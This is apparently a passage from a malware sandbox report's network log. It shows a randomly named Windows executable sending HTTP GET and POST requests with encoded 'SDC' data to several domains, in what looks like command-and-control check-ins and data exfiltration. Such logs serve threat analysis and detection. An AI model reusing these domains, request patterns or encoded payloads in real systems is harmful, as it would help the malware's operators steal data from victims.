54 59 4d 55 59 57 77 2f 31 79 71 4d 4d 31 32 4a 37 72 49 55 56 55 4a 52 61 69 70 6e 35 39 6e 57 2f 50 32 33 52 76 6e 69 57 31 58 7a 39 37 4b 4f 42 70 65 47 71 75 2f 6c 32 45 53 38 56 4f 7a 67 71 5a 6c 61 53 47 30 32 34 35 59 6c 51 6f 76 77 35 4f 49 6c 6b 4d 6b 48 76 6c 75 73 66 62 32 70 45 72 68 30 4c 50 71 4d 4c 2f 55 2f 32 4b 51 75 46 48 64 37 76 68 4e 58 50 6c 6c 4f 70 59 53 4d 50 70 31 6e 54 35 44 46 6b 2f 67 63 47 47 65 4d 31 30 33 32 50 76 72 6e 38 45 2b 58 79 4f 35 67 76 4b 49 73 42 39 6d 4d 4b 4c 70 74 59 74 53 51 61 33 35 73 67 4c 69 39 55 45 4f 37 6f 7a 6c 64 6f 68 70 4c 6c 6d 71 71 65 53 48 47 62 6a 4e 65 41 4e 4e 39 63 38 51 62 5a 69 34 78 75 50 37 37 58 6f 54 64 61 54 30 5a 4d 55 6b 74 6d 6f 64 [TRUNCATED] Data Ascii: SDC=uwiZE0SYbIzkSFGnWr0+X187YTN19obXJkhHa6OLnNhmq4V8r+h13JPrjBs01iAhk16yJsn/3PfdYnRXe/QIgTXxBffwdFCTYMUYWw/1yqMM12J7rIUVUJRaipn59nW/P23RvniW1Xz97KOBpeGqu/l2ES8VOzgqZlaSG0245YlQovw5OIlkMkHvlusfb2pErh0LPqML/U/2KQuFHd7vhNXPllOpYSMPp1nT5DFk/gcGGeM1032Pvrn8E+XyO5gvKIsB9mMKLptYtSQa35sgLi9UEO7ozldohpLlmqqeSHGbjNeANN9c8QbZi4xuP77XoTdaT0ZMUktmodeeFFQr32i7CLUncoNSjPbG/k74FiuBmvDP94UCq4B9GG0PxgYxIeUYtIiN/p2kGi3b+jBVddbajxyNkVgr8fwxx9HkoGAKPRQoNx5T3FKO3QtGJRV/SXMPMMcjzy0QqBsKLPVb9IB5MFd7s2NKfZLVG4j5wdlyHMUTL9E4osMbC4wNOWiE5YWGmTliwXWv7vj4BYOgB60wzEyFSCc14fEnm4ubANbrcN8kqQy+DL2CuEGDJzV73EHJTZgouQAI0BJkYeOAq0J+4rd+P3435NO+PH7wK40+feyJ7ALi0Ek6S6bqALUp6ZGzAvvufPQdJ6lmjZ3z1mGiyHe35dE+RSCRNvaxa3C3FxtgmxIAlHBZ3FmcJjTeYWIsdTijL22xfdNzYX49Xd8RBZv9bEvqDA8p3xD3389jcRzhG7jnFxA9+gyry+anfDvHPBGa0KffUh76+fY8RZYIT+vxmoRf7hO8MGmKZxypj+QV/xorJbHUQmYUo5mu8lIIPkoC0JvO6Qc8TKFDAzG9fHz+PUsQFCyDMi1e397EwMTSBc8i0wM3UB+37/ws4rKlOW5M+Wh01LbphRr+raCDNMKzZ2Gg7alhCSkRioPNTAV+4Fs6DS3vSfEur95CxEPcT0P3HsUK/D6plAqgbprxM4soCYiZ8Q8GMMdtO8sYe3AU [TRUNCATED]
Jan 10, 2025 18:14:56.802335978 CET	533	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 17:14:56 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.10	49996	162.0.236.169	80	2404	C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:14:58.655452013 CET	483	OUT	GET /c69p/?mH=CpePy0P&SDC=jyK5HE7NUJLGVnbkf7QwVicaXg1q4q7wP25RVqGmoZpihph1vtV/87z4vRkTuhYSkBvsM7Lb6tufU3t2WqEWtFDtCNi7ZVC1CswAFEfe3o0h1mFb0A== HTTP/1.1 Host: www.digitalpath.website Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 4.4; en-us; Nexus 4 Build/JOP24G) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Jan 10, 2025 18:14:59.233835936 CET	548	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 17:14:59 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.10	49997	13.248.169.48	80	2404	C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:15:04.291728973 CET	741	OUT	POST /yjjd/ HTTP/1.1 Host: www.bonheur.tech Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.bonheur.tech Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 192 Connection: close Referer: http://www.bonheur.tech/yjjd/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.4; en-us; Nexus 4 Build/JOP24G) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 53 44 43 3d 42 55 6c 44 49 51 77 4c 61 4b 41 49 53 71 59 49 65 4c 57 46 30 6d 68 35 65 66 63 36 48 2b 69 66 35 52 59 7a 63 52 57 45 58 39 44 41 79 55 78 34 38 49 6c 6b 31 52 62 75 61 4f 75 37 71 6b 66 46 68 77 4b 64 54 53 6f 62 55 31 50 46 61 31 68 38 6e 49 43 7a 59 63 4c 55 75 6d 59 43 6f 44 4e 2b 48 32 34 51 35 75 6e 4c 61 68 4a 6c 31 66 61 63 71 54 67 32 57 75 72 77 41 34 38 6c 62 4c 53 57 47 64 50 6c 32 57 42 52 4a 72 54 6d 6a 63 41 6c 6b 74 43 61 75 69 4c 61 47 55 31 72 64 4c 70 6c 36 49 69 30 4b 67 2b 45 78 69 4c 75 61 43 78 34 68 35 58 71 62 52 62 64 77 63 54 6b Data Ascii: SDC=BUlDIQwLaKAISqYIeLWF0mh5efc6H+if5RYzcRWEX9DAyUx48Ilk1RbuaOu7qkfFhwKdTSobU1PFa1h8nICzYcLUumYCoDN+H24Q5unLahJl1facqTg2WurwA48lbLSWGdPl2WBRJrTmjcAlktCauiLaGU1rdLpl6Ii0Kg+ExiLuaCx4h5XqbRbdwcTk
Jan 10, 2025 18:15:04.780093908 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.10	49998	13.248.169.48	80	2404	C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:15:06.849000931 CET	765	OUT	POST /yjjd/ HTTP/1.1 Host: www.bonheur.tech Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.bonheur.tech Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 216 Connection: close Referer: http://www.bonheur.tech/yjjd/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.4; en-us; Nexus 4 Build/JOP24G) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 53 44 43 3d 42 55 6c 44 49 51 77 4c 61 4b 41 49 54 4b 49 49 64 73 71 46 78 47 68 36 52 2f 63 36 63 75 69 54 35 52 63 7a 63 54 36 71 58 4f 6e 41 72 78 56 34 2f 4a 6c 6b 30 52 62 75 53 75 75 45 31 55 66 65 68 77 58 6f 54 53 45 62 55 31 62 46 61 78 74 38 6b 2f 32 30 61 4d 4c 57 69 47 59 4d 31 54 4e 2b 48 32 34 51 35 75 6a 68 61 68 42 6c 31 4c 6d 63 73 78 59 31 56 75 72 7a 57 6f 38 6c 66 4c 53 53 47 64 50 4c 32 55 31 33 4a 6f 37 6d 6a 5a 73 6c 6c 38 43 5a 67 69 4c 63 43 55 30 35 56 37 74 73 36 61 6d 54 4c 52 4f 59 75 52 62 39 55 44 4d 2f 77 6f 32 39 49 6d 48 54 2b 61 6d 4f 77 7a 46 65 51 5a 32 33 61 65 71 63 38 54 2f 4b 78 70 6b 4a 52 41 3d 3d Data Ascii: SDC=BUlDIQwLaKAITKIIdsqFxGh6R/c6cuiT5RczcT6qXOnArxV4/Jlk0RbuSuuE1UfehwXoTSEbU1bFaxt8k/20aMLWiGYM1TN+H24Q5ujhahBl1LmcsxY1VurzWo8lfLSSGdPL2U13Jo7mjZsll8CZgiLcCU05V7ts6amTLROYuRb9UDM/wo29ImHT+amOwzFeQZ23aeqc8T/KxpkJRA==
Jan 10, 2025 18:15:07.313658953 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.10	49999	13.248.169.48	80	2404	C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:15:09.390746117 CET	1778	OUT	POST /yjjd/ HTTP/1.1 Host: www.bonheur.tech Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.bonheur.tech Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 1228 Connection: close Referer: http://www.bonheur.tech/yjjd/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.4; en-us; Nexus 4 Build/JOP24G) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 53 44 43 3d 42 55 6c 44 49 51 77 4c 61 4b 41 49 54 4b 49 49 64 73 71 46 78 47 68 36 52 2f 63 36 63 75 69 54 35 52 63 7a 63 54 36 71 58 4f 76 41 72 6e 5a 34 35 61 4e 6b 7a 52 62 75 59 4f 75 2f 31 55 65 45 68 77 66 6b 54 53 34 4c 55 32 6a 46 62 55 78 38 73 74 65 30 51 4d 4c 57 34 6d 59 4e 6f 44 4d 2b 48 32 6f 75 35 75 54 68 61 68 42 6c 31 4e 43 63 37 7a 67 31 54 75 72 77 41 34 38 35 62 4c 53 32 47 64 6e 39 32 55 78 42 4a 59 62 6d 69 35 38 6c 6d 4b 75 5a 73 69 4c 65 4f 30 31 38 56 36 51 30 36 61 36 66 4c 52 37 51 75 52 54 39 58 46 46 44 74 73 2f 6c 4a 31 7a 74 78 4d 75 50 67 6b 74 6b 4a 35 66 63 58 37 33 45 6f 69 65 56 33 62 68 67 4b 39 57 44 53 56 52 4b 53 4b 61 77 53 54 79 34 6c 42 4a 6b 49 31 46 64 68 77 69 68 54 45 63 70 6e 4c 4f 5a 56 37 7a 41 70 75 6e 70 47 4f 37 6a 55 6f 61 4b 57 33 43 6d 76 31 7a 2b 4a 58 39 77 37 6a 77 64 74 70 69 46 69 56 6c 67 4a 73 51 6e 37 43 35 64 69 61 32 47 48 6d 36 5a 2b 4a 56 6b 51 50 69 61 59 53 31 7a 4e 74 56 51 52 56 6c 45 53 54 54 34 39 4f 59 56 38 55 67 78 49 4a [TRUNCATED] Data Ascii: SDC=BUlDIQwLaKAITKIIdsqFxGh6R/c6cuiT5RczcT6qXOvArnZ45aNkzRbuYOu/1UeEhwfkTS4LU2jFbUx8ste0QMLW4mYNoDM+H2ou5uThahBl1NCc7zg1TurwA485bLS2Gdn92UxBJYbmi58lmKuZsiLeO018V6Q06a6fLR7QuRT9XFFDts/lJ1ztxMuPgktkJ5fcX73EoieV3bhgK9WDSVRKSKawSTy4lBJkI1FdhwihTEcpnLOZV7zApunpGO7jUoaKW3Cmv1z+JX9w7jwdtpiFiVlgJsQn7C5dia2GHm6Z+JVkQPiaYS1zNtVQRVlESTT49OYV8UgxIJw2TCtvxFm+DQBCtvrjVjHqCEy7dAC5cLGV4N9b6Mc5SgYqI5HweI2OtcLYZzzVGu85THszKROJg/KxGJwBiVdnHBuDiOdQ4wL0DaX+SZNbJuNJaba/1TsOCJ0j69lUKS1+eNWRMNEx+8xbrgT29t+FOK3I03q21QP2zP/PV/1NwXLqfs1G4gJfvgxHOfxOugzM959UNN61adjW5P/SmzuqLxWaVYu4WzTXwFhPkwKhhpZ66m1nWPtdL1FZJymwmxs6NzL1Gs+FuQOf8i7ic+L3IeB8lDvhtMA6Row12ljM3TSzWwxrNRPuezFN0t0SoSzO5TzGLhbbynk4rkRw8n86FRv2KKtXfQsn8LOr6TDH1zT2so5L/QV7NIdsArHpzaVYI4JaWKizTjwDr9YDQCFmTc6nUbz8MEk03mCDX0RuqmZQ7l4nZaC5078N1rd1dB1e1b5NYYdZX6MQ9Q2TGTMzEIh4O7ANJxq1+DCHwvOnMIKWu94i8Iupe9wkURoArb7b1NdHqY8/uEv95HRHw/RUAulUe92+89yUCAG6wZX3rhof4Wudy6MRmlyCI+jTuB92GGe2V70EVAfvpvHVlKetVJBLHAKASpuHwPsJsEEmvt92cs5jBHOJ5m2VDr7l0OKTHAtSesTI1CJ5Ybh+gOdenM+q4Gp84784 [TRUNCATED]
Jan 10, 2025 18:15:09.873769045 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.10	50000	13.248.169.48	80	2404	C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:15:11.930669069 CET	476	OUT	GET /yjjd/?SDC=MWNjLlRwXekue+QzVuys4xl2S9wrceSWxW9TUDuiZq768glRmLRQ5DrcZ+2LxVrk3Fm2ehcXeXOAVGFzhdK4ff29jHlX+n9HZzQZjI7+FRlLo7a74Q==&mH=CpePy0P HTTP/1.1 Host: www.bonheur.tech Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 4.4; en-us; Nexus 4 Build/JOP24G) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Jan 10, 2025 18:15:17.406795979 CET	367	IN	HTTP/1.1 200 OK content-type: text/html date: Fri, 10 Jan 2025 17:15:17 GMT content-length: 246 connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 53 44 43 3d 4d 57 4e 6a 4c 6c 52 77 58 65 6b 75 65 2b 51 7a 56 75 79 73 34 78 6c 32 53 39 77 72 63 65 53 57 78 57 39 54 55 44 75 69 5a 71 37 36 38 67 6c 52 6d 4c 52 51 35 44 72 63 5a 2b 32 4c 78 56 72 6b 33 46 6d 32 65 68 63 58 65 58 4f 41 56 47 46 7a 68 64 4b 34 66 66 32 39 6a 48 6c 58 2b 6e 39 48 5a 7a 51 5a 6a 49 37 2b 46 52 6c 4c 6f 37 61 37 34 51 3d 3d 26 6d 48 3d 43 70 65 50 79 30 50 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?SDC=MWNjLlRwXekue+QzVuys4xl2S9wrceSWxW9TUDuiZq768glRmLRQ5DrcZ+2LxVrk3Fm2ehcXeXOAVGFzhdK4ff29jHlX+n9HZzQZjI7+FRlLo7a74Q==&mH=CpePy0P"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.10	50001	13.248.169.48	80	2404	C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:15:22.508578062 CET	765	OUT	POST /yvuf/ HTTP/1.1 Host: www.londonatnight.coffee Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.londonatnight.coffee Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 192 Connection: close Referer: http://www.londonatnight.coffee/yvuf/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.4; en-us; Nexus 4 Build/JOP24G) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 53 44 43 3d 70 59 31 2b 79 77 6a 63 6f 73 37 43 47 4e 73 56 4c 74 46 75 6a 47 2f 30 6e 35 51 41 4d 6c 61 62 74 55 6f 62 51 6a 79 57 57 69 31 59 51 55 73 6c 42 77 6c 76 4d 32 63 43 6e 56 4d 6d 61 67 55 63 79 6d 6d 31 6e 54 48 39 48 62 4b 4f 4a 30 65 54 6b 55 41 64 54 52 2f 44 68 44 52 48 68 54 6f 79 4d 4e 70 4a 73 34 6c 72 70 44 2b 4e 67 47 69 51 50 49 59 4a 75 44 73 36 71 50 37 51 39 78 31 77 7a 79 36 42 67 43 45 68 52 57 4b 62 2f 46 4c 4e 70 38 72 6f 7a 70 72 43 33 57 6e 75 6b 47 6f 33 30 48 68 78 67 63 73 79 4a 62 59 4d 53 50 6a 4d 6e 36 39 75 43 41 63 68 6a 42 66 51 Data Ascii: SDC=pY1+ywjcos7CGNsVLtFujG/0n5QAMlabtUobQjyWWi1YQUslBwlvM2cCnVMmagUcymm1nTH9HbKOJ0eTkUAdTR/DhDRHhToyMNpJs4lrpD+NgGiQPIYJuDs6qP7Q9x1wzy6BgCEhRWKb/FLNp8rozprC3WnukGo30HhxgcsyJbYMSPjMn69uCAchjBfQ
Jan 10, 2025 18:15:22.967448950 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.10	50002	13.248.169.48	80	2404	C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:15:25.070415020 CET	789	OUT	POST /yvuf/ HTTP/1.1 Host: www.londonatnight.coffee Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.londonatnight.coffee Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 216 Connection: close Referer: http://www.londonatnight.coffee/yvuf/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.4; en-us; Nexus 4 Build/JOP24G) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 53 44 43 3d 70 59 31 2b 79 77 6a 63 6f 73 37 43 48 74 63 56 4e 4f 64 75 6b 6d 2f 33 35 4a 51 41 58 31 61 66 74 55 6b 62 51 6e 4b 38 57 51 68 59 51 30 38 6c 41 78 6c 76 50 32 63 43 76 31 4d 6a 55 41 55 70 79 6d 69 39 6e 52 44 39 48 66 69 4f 4a 30 75 54 6b 6e 59 43 56 42 2f 4e 34 7a 52 4a 76 7a 6f 79 4d 4e 70 4a 73 34 41 77 70 44 47 4e 67 33 53 51 4f 70 59 4b 6a 6a 73 35 37 50 37 51 35 78 31 38 7a 79 36 7a 67 42 42 4f 52 54 47 62 2f 45 37 4e 70 74 72 72 34 70 72 49 34 32 6d 59 67 57 64 67 75 48 78 74 35 76 45 43 53 35 55 75 63 4f 65 4c 32 72 63 35 52 33 41 76 74 48 71 36 53 79 58 52 4e 58 42 6d 45 6e 34 66 6d 72 30 41 73 33 42 45 56 51 3d 3d Data Ascii: SDC=pY1+ywjcos7CHtcVNOdukm/35JQAX1aftUkbQnK8WQhYQ08lAxlvP2cCv1MjUAUpymi9nRD9HfiOJ0uTknYCVB/N4zRJvzoyMNpJs4AwpDGNg3SQOpYKjjs57P7Q5x18zy6zgBBORTGb/E7Nptrr4prI42mYgWdguHxt5vECS5UucOeL2rc5R3AvtHq6SyXRNXBmEn4fmr0As3BEVQ==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.10	50003	13.248.169.48	80	2404	C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:15:27.625950098 CET	1802	OUT	POST /yvuf/ HTTP/1.1 Host: www.londonatnight.coffee Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.londonatnight.coffee Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 1228 Connection: close Referer: http://www.londonatnight.coffee/yvuf/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.4; en-us; Nexus 4 Build/JOP24G) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 53 44 43 3d 70 59 31 2b 79 77 6a 63 6f 73 37 43 48 74 63 56 4e 4f 64 75 6b 6d 2f 33 35 4a 51 41 58 31 61 66 74 55 6b 62 51 6e 4b 38 57 52 5a 59 51 69 77 6c 47 53 4e 76 41 57 63 43 6c 56 4d 59 55 41 55 30 79 69 4f 44 6e 52 4f 49 48 5a 6d 4f 49 58 6d 54 6d 57 59 43 63 42 2f 4e 77 54 52 49 68 54 70 34 4d 4e 35 4e 73 34 51 77 70 44 47 4e 67 31 61 51 59 49 59 4b 77 7a 73 36 71 50 37 55 39 78 30 56 7a 32 65 5a 67 43 74 6b 53 6e 36 62 78 45 72 4e 76 66 7a 72 6e 5a 72 47 78 6d 6d 51 67 57 41 6e 75 48 39 4c 35 75 77 6b 53 37 45 75 64 36 62 4f 68 61 34 78 53 31 59 57 72 33 2b 68 59 33 4c 36 43 6d 41 75 49 53 74 47 31 75 4a 57 74 55 55 6f 41 78 48 74 36 2f 4a 4a 55 4a 76 39 75 56 73 78 7a 51 34 7a 79 42 49 34 31 6f 39 53 37 77 51 51 45 67 4a 4d 57 2b 67 63 6d 62 4e 55 49 54 30 76 71 63 54 64 50 6a 43 33 41 7a 5a 44 50 37 4f 74 66 50 76 6b 38 6f 52 36 2f 69 53 61 4c 7a 55 4a 4c 69 57 62 47 4b 51 2f 4d 48 73 6a 57 77 41 36 39 78 4b 62 55 4d 78 66 2b 61 2f 67 46 4f 4b 6d 2b 32 5a 2b 70 4b 4d 33 45 6e 75 54 67 2b [TRUNCATED] Data Ascii: SDC=pY1+ywjcos7CHtcVNOdukm/35JQAX1aftUkbQnK8WRZYQiwlGSNvAWcClVMYUAU0yiODnROIHZmOIXmTmWYCcB/NwTRIhTp4MN5Ns4QwpDGNg1aQYIYKwzs6qP7U9x0Vz2eZgCtkSn6bxErNvfzrnZrGxmmQgWAnuH9L5uwkS7Eud6bOha4xS1YWr3+hY3L6CmAuIStG1uJWtUUoAxHt6/JJUJv9uVsxzQ4zyBI41o9S7wQQEgJMW+gcmbNUIT0vqcTdPjC3AzZDP7OtfPvk8oR6/iSaLzUJLiWbGKQ/MHsjWwA69xKbUMxf+a/gFOKm+2Z+pKM3EnuTg+pKEfVn1yqbElmGJfSf9ajSAIRgkV/hzQP5t4QyZPk3oOhvcPkH4Q/xT0Z3Z3QO/zp1cpKnMLPT3siIW+4zH/mbIn61rxtzIcqOAhD+TBK1rOzftO6zXqYRktEklUVYkss/GvQIRZkR7zYUxSUvr33JhRu86S3t9yuHpPnZZ91Fkez/5fePgdeE53oAVE+FdY/fd1gkzGkkfIBcpbzu5C3ik4bDW5GT0vjsD4iu/SX/Ew7IaxFtLpDJf8nu8IGUUWBl1sG/ZIxeFnJqiI/5rypmBwecW0IRmUH6YrpswOiEffqXOZw8lxT3Me5hERWyn2masZRGOAILXbTXYvj/BMCRFyTVyTJN+w6B8yNkp/Nwf1e12qUAG9hK4pCD4roXoJETuxO0hEH+XM7Zdw4C72iqFhTzoj8EkhzCU9IHEHEYr31AwDj67H2aQ2yiFuGY0N69uUOOflffYHZrFwGeWq5yOxl0YMjBlUg2lvHH9RQZtfqoWfIuxLcwpqGNiDntlZsxjH0vGM2KqYIUlBAVfntrjIggdrJzpJD/0/ucgqt9g6nG2AtTAHFjjmFWbaT4xN1KeB674kbu61lX4+oM61G9XA3t+FLnSFF817ulZCljDNTacxHEiYtn9J7MJJSCMkItakA7vkI1plUKmKHc8UDRbw9dugoejBSs [TRUNCATED]
